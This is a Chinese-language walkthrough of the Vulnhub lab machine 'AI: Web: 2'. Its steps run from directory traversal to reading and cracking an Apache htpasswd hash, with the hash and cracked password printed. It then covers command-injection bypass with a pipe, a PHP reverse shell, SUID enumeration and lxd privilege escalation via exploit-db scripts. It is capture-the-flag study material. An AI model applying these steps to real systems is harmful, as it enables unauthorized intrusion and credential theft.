zoukankan      html  css  js  c++  java
  • AI: Web: 2 Vulnhub Walkthrough

    靶机下载链接:

    https://www.vulnhub.com/entry/ai-web-2,357

    主机端口扫描:

    尝试SQL注入,未发现有注入漏洞,就注册创建于一账户

    http://10.10.202.160/userpage.php

    漏洞库搜索下:

    XuezhuLi FileSharing - Directory Traversal

    https://www.exploit-db.com/exploits/40009

    我们爆破下目录看下

    ╰─ sudo python3 dirsearch.py -u http://10.10.202.160/ -e .php

    我们尝试包含下Apache的认证文件看看

    aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/

    ╰─ john  --wordlist=/usr/share/wordlists/rockyou.txt  htpwd

    aiweb2admin:c.ronaldo

    经过尝试&& ; | 发现| 可以绕过执行命令

    访问:http://10.10.202.160/webadmin/H05Tpin9555/php-reverse.php

    接下来进行提权操作:

    find / -perm -u=s -type f 2>/dev/null

    find / -perm -g=s -type f 2>/dev/null

    n0nr00tuser@aiweb2host:/tmp$ ./LinEnum.sh

    ╰─ searchsploit lxd

    创建hack.sh 文件,拷贝如下链接的脚本内容到hack.sh

    https://www.exploit-db.com/exploits/46978

     OVER !! 

  • 相关阅读:
    副本集-Replica Sets
    SpringBoot整合SpringData MongoDB
    Auth认证
    Form
    flask一些插件
    SQLAlchemy
    session
    上下文
    flask路由
    Flask中间件
  • 原文地址:https://www.cnblogs.com/hack404/p/11482310.html
Copyright © 2011-2022 走看看